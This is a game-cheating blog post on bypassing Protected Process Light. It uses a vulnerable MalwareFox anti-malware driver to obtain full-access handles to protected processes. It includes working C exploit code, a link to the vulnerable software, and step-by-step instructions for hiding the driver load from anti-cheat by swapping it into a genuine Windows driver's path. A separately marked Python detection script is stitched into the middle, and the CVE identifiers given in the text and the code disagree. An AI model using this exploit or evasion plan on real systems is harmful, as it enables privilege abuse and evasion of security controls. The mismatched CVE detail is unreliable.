Bypass PPL Protected Processes (Protected Process Light)

Using a vulnerable driver, we can bypass PPL protected processes. A Protected Process Light is part of an anti-cheat engine for certain games. To put it bluntly, we can use a vulnerability in the MalwareFox Anti-Malware driver to get an all-access inheritable process handle to PPL protected processes, therefore bypassing PPL protection.

Bypass PPL Protected Processes

On the 2nd of February 2018, a vulnerability was publicly released under the ID CVE-2018-6593.

Here is the description: An issue was discovered in MalwareFox AntiMalware 2.74.0.150. Improper access control in zam32.sys and zam64.sys allows a non-privileged process to register itself with the driver by connecting to the filter communication port and then using IOCTL 0x8000204C to ZemanaAntiMalware to elevate privileges.

Along with the vulnerability, a public exploit for it was disclosed. In this exploit, the exploiting process registers itself with the vulnerable driver and then gains the ability to use the normally restricted IOCTLs of the driver. One of them allows you to get an all-access inheritable process handle created from the kernel thanks to the driver. I then tried to get a process handle on BE & EAC protected games, but unfortunately, the handle permissions get modified like a handle created from a normal (Nt)OpenProcess. But then I thought about the driver. It seemed useless for the shady things you and I are interested in, when suddenly an idea came to my mind:
How about using this driver to get a fully privileged process handle on a PPL protected process, let's say CSRSS on Windows 10 x64 for example?


Thanks to this handle you can now take control of the process, and run your hacks from it. I tested the other day and even with the up-to-date anti-malware software, I can still exploit their driver, so you can just download their software and do it yourself. Remember, you do not have to keep the driver loaded, you can simply load the driver, get the handle, and unload the driver.

You can get a piece of the vulnerable software here (in case it gets updated and fixed later). However the official site is located here. Personally, I only use Emsisoft (try it free for 30 days) but it will not work with this hack to Bypass PPL Protected Processes.


Using Stealth when you Bypass PPL Protected Processes

I have little to no experience in leveraging vulnerable drivers for cheating purposes so I cannot give you precise recommendations to hide the fact that you loaded this driver. But it should not matter, since this is anti-malware, not a known hack tool. I did read that the Windows log keeps track of recently loaded drivers, and having this driver loaded then directly unloaded in the logs might raise suspicion. But I am not sure that games are able to check the logs.

If the logs only show that the driver at path "C:\something\driver.sys" was loaded, you could find a driver that many people have (e.g. Windows Defender driver that comes natively with all modern Windows, let's say that it's located in Windows\System32\defender.sys) then in your bypass installer:

  1. Rename the genuine driver as *.sys.tmp
  2. Move & rename MalwareFox driver to be at the exact location of the genuine driver that we just moved
  3. Load driver, get your handle, unload driver
  4. Delete MalwareFox driver from where we copied it
  5. Rename the genuine driver back to its original name

If the game checks the list of recently loaded drivers it'll see that a driver at path Windows\System32\defender.sys was loaded, and if they check what this driver is, they'll see a genuine wide-spread driver.
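Seen from the detection side, the swap above only defeats checks that key on the file path; the signer recorded with each driver load still identifies what was actually loaded. The following is an added example, not part of the original post, that triages records shaped like Sysmon Event ID 6 (Driver loaded) against a per-path signer baseline. The event records, the baseline entry and the signer names are constructed for illustration.

```python
import ntpath

# Baseline (constructed): normalized driver path -> signer expected at that path.
BASELINE = {r"c:\windows\system32\defender.sys": "Microsoft Windows"}

# Signers of drivers being watched for known vulnerabilities (placeholder name).
WATCHED_SIGNERS = {"Example AV Vendor Ltd"}

# Constructed records using the field names of Sysmon Event ID 6 (Driver loaded).
EVENTS = [
    {"UtcTime": "2018-03-01 10:00:01", "Signature": "Microsoft Windows",
     "ImageLoaded": r"C:\Windows\System32\defender.sys"},
    {"UtcTime": "2018-03-01 10:05:12", "Signature": "Example AV Vendor Ltd",
     "ImageLoaded": r"C:\WINDOWS\system32\defender.sys"},
    {"UtcTime": "2018-03-01 10:07:40", "Signature": "Example AV Vendor Ltd",
     "ImageLoaded": r"C:\Users\test\AppData\Local\Temp\helper.sys"},
]


def normalize(path):
    """Collapse '..' segments and case so path spelling cannot dodge the lookup."""
    return ntpath.normpath(path).lower()


def findings_for(event):
    """Return the reasons a single driver-load event deserves a look."""
    reasons = []
    signer = event.get("Signature", "")
    expected = BASELINE.get(normalize(event["ImageLoaded"]))
    if expected is not None and signer != expected:
        reasons.append("signer-mismatch-for-path")
    if signer in WATCHED_SIGNERS:
        reasons.append("watched-signer")
    return reasons


def triage(events):
    """Map UtcTime -> reasons for every event with at least one finding."""
    flagged = {}
    for event in events:
        reasons = findings_for(event)
        if reasons:
            flagged[event["UtcTime"]] = reasons
    return flagged


if __name__ == "__main__":
    for when, reasons in triage(EVENTS).items():
        print(when, ", ".join(reasons))
```

The second record is the swapped-driver case: the path matches the baseline entry, but the signer does not, so it is flagged on both rules.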


Example Code to Bypass PPL Protected Processes

This code doesn't include loading and unloading the driver; it supposes that the driver is already loaded. You can find the functions to load and unload a driver programmatically on Google/Stackoverflow easily.

    #pragma once
    #include <Windows.h>

    HANDLE MFAMGetHandle(DWORD pid) {
        // Connecting the vulnerable driver (MalwareFox AntiMalware 2.74.0.150, Local Privilege Escalation, CVE-2018-6606)
        HANDLE hDevice = CreateFile(L"\\\\.\\ZemanaAntiMalware", GENERIC_READ | GENERIC_WRITE, 0, NULL, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL);
        if (hDevice == INVALID_HANDLE_VALUE)
            return (HANDLE)0x0;
        // Registering our process with the driver
        DWORD ourPID = GetCurrentProcessId();
        if (!DeviceIoControl(hDevice, 0x80002010, &ourPID, sizeof(DWORD), NULL, 0, NULL, NULL)) {
            CloseHandle(hDevice);
            return (HANDLE)0x0;
        }
        // Using IOCTL to get full access process handle
        HANDLE hProcess = NULL;
        DeviceIoControl(hDevice, 0x8000204C, &pid, sizeof(DWORD), &hProcess, sizeof(HANDLE), NULL, NULL);
        CloseHandle(hDevice);
        return hProcess;
    }

I hope some of you find some use to this info on how to Bypass PPL Protected Processes.

credit to harakirinox for the above information on how to Bypass PPL Protected Processes
